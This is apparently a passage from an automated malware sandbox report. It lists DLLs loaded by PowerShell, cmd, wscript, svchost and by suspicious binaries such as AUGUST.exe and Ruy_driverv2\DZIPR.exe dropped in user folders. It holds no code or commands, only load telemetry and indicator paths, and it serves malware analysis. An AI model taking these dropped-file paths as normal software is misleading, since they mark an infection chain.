                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\DZIPR.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
